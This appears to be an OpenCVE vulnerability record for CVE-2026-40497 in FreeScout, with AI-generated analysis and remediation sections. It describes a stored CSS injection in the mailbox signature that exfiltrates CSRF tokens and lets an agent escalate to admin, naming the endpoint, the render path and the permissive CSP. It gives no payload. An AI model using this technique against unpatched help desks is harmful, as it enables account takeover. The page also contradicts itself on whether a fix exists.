Description
FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.213, FreeScout's `Helper::stripDangerousTags()` removes `<script>`, `<form>`, `<iframe>`, `<object>` but does NOT strip `<style>` tags. The mailbox signature field is saved via POST /mailbox/settings/{id} and later rendered unescaped via `{!! $conversation->getSignatureProcessed([], true) !!}` in conversation views. CSP allows `style-src * 'self' 'unsafe-inline'`, so injected inline styles execute freely. An attacker with access to mailbox settings (admin or agent with mailbox permission) can inject CSS attribute selectors to exfiltrate the CSRF token of any agent/admin who views a conversation in that mailbox. With the CSRF token, the attacker can perform any state-changing action as the victim (create admin accounts, change email/password, etc.) — privilege escalation from agent to admin. This is the result of an incomplete fix of GHSA-jqjf-f566-485j. That advisory reported XSS via mailbox signature. The fix applied `Helper::stripDangerousTags()` to the signature before saving. However, `stripDangerousTags()` only removes `script`, `form`, `iframe`, and `object` tags — it does NOT strip `<style>` tags, leaving CSS injection possible. Version 1.8.213 contains an updated fix.
Published: 2026-04-21
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: Privilege Escalation via CSRF Token Theft
Action: Patch Immediately
AI Analysis

Impact

FreeScout fails to strip <style> tags from mailbox signatures. When a signature containing inline CSS is stored, it is rendered with unsafe HTML, allowing attackers who can edit mailbox settings to inject CSS selectors that read the CSRF token of any user who views a conversation. The stolen token enables the attacker to perform state‑changing actions as that user, such as creating administrative accounts or changing passwords, effectively escalating from an agent to an administrator. This flaw is categorized as a stored cross‑site scripting vulnerability (CWE‑79).

Affected Systems

The vulnerability affects all FreeScout installations running a version older than 1.8.213. The issue is present in the freescout-help-desk:freescout product before this release and was fully addressed in the 1.8.213 update.

Risk and Exploitability

The CVSS base score of 8.1 indicates a high severity risk, although the EPSS score is not available and the vulnerability is not listed in the CISA KEV catalog, suggesting no publicly documented exploitation yet. Exploitation requires authenticated access to mailbox settings, meaning the attacker must be a user with mailbox management privileges (admin or agent). Once the privilege escalation occurs, any authenticated action can be abused. Because the flaw relies on stored data, an attacker could persist the exploit through repeated sessions but would need to maintain credentials to inject the malicious signature.

Generated by OpenCVE AI on April 21, 2026 at 15:29 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update FreeScout to version 1.8.213 or later, which sanitizes the signature field during save.
  • Limit mailbox settings modification rights to administrators only; remove this permission from agents if unnecessary.
  • Audit existing mailbox signatures and delete any embedded <style> tags or inline CSS; reset them to plain text or safe HTML.
  • Enable an audit trail for signature changes so that any unauthorized modifications can be detected and rolled back.

Generated by OpenCVE AI on April 21, 2026 at 15:29 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 23 Apr 2026 16:45:00 +0000

Type Values Removed Values Added
First Time appeared Freescout
Freescout freescout
CPEs cpe:2.3:a:freescout:freescout:*:*:*:*:*:*:*:*
Vendors & Products Freescout
Freescout freescout

Tue, 21 Apr 2026 14:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Tue, 21 Apr 2026 03:45:00 +0000

Type Values Removed Values Added
First Time appeared Freescout Helpdesk
Freescout Helpdesk freescout
Vendors & Products Freescout Helpdesk
Freescout Helpdesk freescout

Tue, 21 Apr 2026 02:45:00 +0000

Type Values Removed Values Added
Description FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.213, FreeScout's `Helper::stripDangerousTags()` removes `<script>`, `<form>`, `<iframe>`, `<object>` but does NOT strip `<style>` tags. The mailbox signature field is saved via POST /mailbox/settings/{id} and later rendered unescaped via `{!! $conversation->getSignatureProcessed([], true) !!}` in conversation views. CSP allows `style-src * 'self' 'unsafe-inline'`, so injected inline styles execute freely. An attacker with access to mailbox settings (admin or agent with mailbox permission) can inject CSS attribute selectors to exfiltrate the CSRF token of any agent/admin who views a conversation in that mailbox. With the CSRF token, the attacker can perform any state-changing action as the victim (create admin accounts, change email/password, etc.) — privilege escalation from agent to admin. This is the result of an incomplete fix of GHSA-jqjf-f566-485j. That advisory reported XSS via mailbox signature. The fix applied `Helper::stripDangerousTags()` to the signature before saving. However, `stripDangerousTags()` only removes `script`, `form`, `iframe`, and `object` tags — it does NOT strip `<style>` tags, leaving CSS injection possible. Version 1.8.213 contains an updated fix.
Title FreeScout Vulnerable to CSS Injection via Stored Style Tag in Mailbox Signature (CSRF Token Exfiltration)
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N'}

Subscriptions

Freescout Freescout
Freescout Helpdesk Freescout
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-21T13:25:21.103Z

Reserved: 2026-04-13T19:50:42.115Z

Link: CVE-2026-40497

cve-icon Vulnrichment

Updated: 2026-04-21T13:25:08.199Z

cve-icon NVD

Status : Analyzed

Published: 2026-04-21T03:16:08.403

Modified: 2026-04-23T16:32:04.787

Link: CVE-2026-40497

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-21T15:37:55Z

Weaknesses